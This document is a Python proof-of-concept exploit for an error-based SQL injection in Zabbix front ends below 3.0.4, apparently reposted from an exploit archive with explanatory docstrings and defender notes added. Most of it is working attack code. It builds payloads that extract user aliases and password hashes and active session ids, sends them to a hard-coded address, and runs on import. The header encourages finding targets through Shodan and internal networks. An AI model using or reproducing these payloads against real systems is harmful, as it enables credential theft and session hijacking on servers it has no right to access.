# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Date: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)
# PoC Author: Zzzians
# Contact: [email protected]
# Test on: Linux (Debian/CentOS/Ubuntu)
# -*- coding: utf_8 -*-
# Use Shodan or and enjoy :)
# Comb the intranet for zabbix and enjoy :)
import sys,os,re,urllib2
def Inject(url,sql,reg):
    """Request ``jsrpc.php`` with *sql* in ``profileIdx2`` and return the first match of *reg*.

    The SQL fragment is URL-quoted and placed in the ``profileIdx2`` query
    parameter of a fixed ``jsrpc.php`` query string. According to this
    file's header, Zabbix versions from 2.0 up to, but not including, 3.0.4
    are affected, so upgrading to 3.0.4 or later is the remediation the
    header implies.

    Defender notes:
      * The request is a plain GET, so the quoted SQL is part of the URL and
        should appear in web-server access logs. Requests to ``jsrpc.php``
        whose ``profileIdx2`` value contains SQL syntax (parentheses,
        ``select``) are a usable detection signal.
      * No cookie or credential is sent by this code; the only session-like
        value is the fixed ``sid`` in the query string.

    Args:
        url: Base URL of the Zabbix front end, expected to end with ``/``.
        sql: SQL fragment to place in ``profileIdx2``.
        reg: Regular expression applied to the response body.

    Returns:
        The first match of *reg* in the response body, or ``None`` when the
        request fails or nothing matches.
    """
    # NOTE(review): the non-ASCII character inside the query string looks like
    # an extraction artifact of the page; it is reproduced here as found.
    query_head = "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2="
    query_tail = "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    payload = url + query_head + urllib2.quote(sql) + query_tail

    try:
        response = urllib2.urlopen(payload, timeout=20).read()
    except Exception, msg:
        # Any failure (network error, HTTP error, timeout) is reported and
        # the function falls through to an implicit "no result".
        print '\t\tOpps,an error occurs...',msg
        return None

    # The value of interest is carried back inside a database error message
    # echoed in the response body, which *reg* is written to pick apart.
    results = re.compile(reg).findall(response)
    print payload #Uncomment this to see details
    if not results:
        return None
    return results[0]
def exploit(url,userid):
    """Run the two extraction queries for *userid* against *url* and print the results.

    Two SQL fragments are built and handed to ``Inject``:
      * one selects ``alias`` and ``passwd`` from ``zabbix.users`` for the row
        at offset ``userid - 1``;
      * one selects ``sessionid``, ``userid`` and ``status`` from
        ``zabbix.sessions`` for rows with ``status=0`` and the given userid.

    Both wrap the sub-select in a ``count(*) ... group by`` over
    ``floor(rand(0)*2)``, and the result is read back from a
    ``Duplicate entry '...'`` message in the HTTP response, i.e. the data
    leaves the server through an echoed database error.

    Defender notes:
      * Responses from the Zabbix front end that contain ``Duplicate entry``
        are a sign that database errors reach the client and are worth
        alerting on.
      * If the requests described above show up in logs of a version the
        header lists as affected (below 3.0.4), treat the listed user
        password values and session ids as exposed: rotate the passwords
        and invalidate the sessions after upgrading.

    Args:
        url: Base URL of the Zabbix front end, ending with ``/``.
        userid: Integer user id; also used (minus one) as the row offset in
            the users query.
    """
    offset = str(userid-1)
    uid = str(userid)

    passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+offset+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+uid+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"

    # 0x7e is "~": the users query ends its value with "~~", the sessions
    # query with a single "~", which is what the two patterns anchor on.
    password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
    if not password:
        print '[-]Get Password Failed'
    else:
        print '[+]Username~Password : %s' % password

    session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
    if not session_id:
        print "[-]Get Session id Failed"
    else:
        print "[+]Session_id:%s" % session_id

    print '\n'
def main():
    """Print the banner, then call ``exploit`` for each hard-coded URL and user id.

    The target list and the user ids are literals in this function: a single
    private-range address (``http://10.15.5.86``) and the ids 1 and 2. There
    is no command-line handling.
    """
    banner = (
        '=' * 70,
        '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc',
        '\t\t Author:Zzzians([email protected])',
        '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82',
        '\t\t\t Time:2016-08-20\n',
    )
    for line in banner:
        print line

    urls = ["http://10.15.5.86"]
    ids = [1,2]
    rule = '='*25
    for url in urls:
        # The request path is appended directly, so the base URL must end
        # with a slash.
        if url[-1] != '/':
            url = url + '/'
        print rule + url + rule
        for userid in ids:
            exploit(url,userid)
# Module-level call with no __main__ guard: main() runs, and sends its
# requests, whenever this file is executed or imported.
main()
# 0day.today [2018-02-16] #